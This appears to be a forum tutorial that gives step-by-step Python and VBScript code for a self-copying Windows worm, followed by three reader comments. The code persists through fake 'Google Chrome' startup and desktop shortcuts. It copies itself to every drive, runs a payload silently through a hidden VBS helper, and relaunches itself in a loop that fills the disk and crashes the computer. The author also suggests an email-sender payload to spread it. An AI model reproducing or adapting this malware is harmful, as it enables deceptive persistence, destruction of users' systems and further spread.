Greetings, fellow ethical hackers! Today I will be demonstrating the process by which one can create a polymorphic worm in python. As an aside, I shall explain each and every step of said process; I don't do this just to feed the skiddies. With that said, let's dive into the code. First, we will need to download a few things. Grab a copy of Python 3.5 and install, as well as the winshell module. Now, create a file entitled "morph.pyw". The ".pyw" means that the file will run silently, without displaying the GUI.
Open the file (preferably in N++), then type:
import os, winshell
from win32com.client import Dispatch
from random import choice
from string import ascii_uppercase
from distutils.dir(underscore)util import copy(underscore)tree
Note: the (underscore)s should be replaced with actual underscores in your code. These are all of the libraries that we need to import.
Next, we will define our vital variables:
thisdir = os.getcwd()
thatdir = (''.join(choice(ascii_uppercase) for i in range(15)))
The first one means that we set a var thisdir equal to the directory containing morph.pyw. The second means that we define thatdir to be a random string of 15 uppercase ASCII characters.
Next, type:
if os.path.exists(thisdir):
----------if os.path.exists('C:'):
--------------------if not os.path.exists(r'C:\\' + thatdir):
---------------------------os.mkdir(r'C:\\' + thatdir)
---------------------------copy_tree(thisdir, r'C:\\' + thatdir)
Note: here, dashes represent spaces. This is stating that if there exists a directory thisdir (the superset of files containing morph.pyw), and a drive C: (usually the OS drive letter), and a directory C:\thatdir does not already exist, python will create a directory C:\thatdir and copy the contents of thisdir to C:\thatdir. \ is a reserved character, so we use two backslashes and convert the result to a raw string.
Now, key in the following:
startup = winshell.startup()
path = os.path.join(startup, "Google Chrome.lnk")
targ = r"C:\\" + thatdir + r"\\morph.pyw"
dirin = r"C:\\" + thatdir
ico = r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
This defines a var startup to be the windows startup folder, as detected by winshell, a var path to be startup\Google Chrome.lnk (a faux shortcut to the eponymous web browser), a var targ to be C:\thatdir\morph.pyw, a var dirin to be C:\thatdir, and a var ico to be C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (the location of the chrome icon).
For this stage of the virus, type:
shell = Dispatch('Wscript.Shell')
shortcut = shell.CreateShortCut(path)
shortcut.TargetPath = targ
shortcut.WorkingDirectory = dirin
shortcut.IconLocation = ico
shortcut.save()
We are using Wscript.Shell to create a shortcut, then setting the attributes TargetPath (what the shortcut will link to), WorkingDirectory (the dir of the target), and IconLocation (where the .ico file is) to targ, dirin, and ico, respectively.
Now, we do the same for a desktop shortcut:
desktop = winshell.desktop()
path = os.path.join(startup, "Google Chrome.lnk")
targ = r"C:\\" + thatdir + r"\\morph.pyw"
dirin = r"C:\\" + thatdir
ico = r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
shell = Dispatch('Wscript.Shell')
shortcut = shell.CreateShortCut(path)
shortcut.TargetPath = targ
shortcut.WorkingDirectory = dirin
shortcut.IconLocation = ico
shortcut.save()
I already explained a similar process, so I won't go into detail delineating this one.
Next, type:
if os.path.exists(thisdir):
----------if os.path.exists('Drive:'):
--------------------if not os.path.exists(r'Drive:\\' + thatdir):
---------------------------os.mkdir(r'Drive:\\' + thatdir)
---------------------------copy_tree(thisdir, r'Drive:\\' + thatdir)
Note: replace the word 'Drive' with a letter in your code. Do this for each possible drive letter. We are copying thisdir to each and every drive in the system.
Next, open up a new file in thisdir. This file will be named 'hideme.vbs'. We will use it to silently execute stuff.
Inside this file, type:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
This simply enables us to pass arguments to cmd without any visible GUI.
Now, type into morph:
if os.path.exists(r'C:\\' + thatdir):
cmd = 'wscript.exe r"C:\\" + thatdir + r"\\hideme.vbs" r"C:\\" + thatdir + r"\\payload.file"'
os.system(cmd)
Note: replace 'payload.file' with the name of your payload (this assumes that payload.file is in the same folder as morph.pyw). This is stating that if our directory C:\thatdir exists, cmd will execute your payload silently. If you want to make it more virulent, use an email sender script as your payload.
Create a .bat file called launcher.bat in thisdir. In it, enter:
morph.pyw %*
This will run morph.pyw
Lastly, but perhaps most importantly, type into morph:
if os.path.exists(r'C:\\' + thatdir):
cmd = 'wscript.exe r"C:\\" + thatdir + r"\\hideme.vbs" r"C:\\" + thatdir + r"\\launcher.bat"'
os.system(cmd)
This will run the program in an infinite loop, exhausting hard-drive space and crashing the computer.
You have finished my tutorial, bravo!
Congratulation, a winrar is you!
3 Responses
What exactly makes this polymorphic?
I suppose that I should have instead said 'pseudo-polymorphic'. It does not exhibit true polymorphic behaviour, as it does not contain an encryption system that permutates each time the virus is run. However, part of its signature, thatdir, does. I will work on creating a dynamic encryption system that changes each time the file is copied.
Seriously sorry about the misleading title, I've only recently started writing viruses.
Share Your Thoughts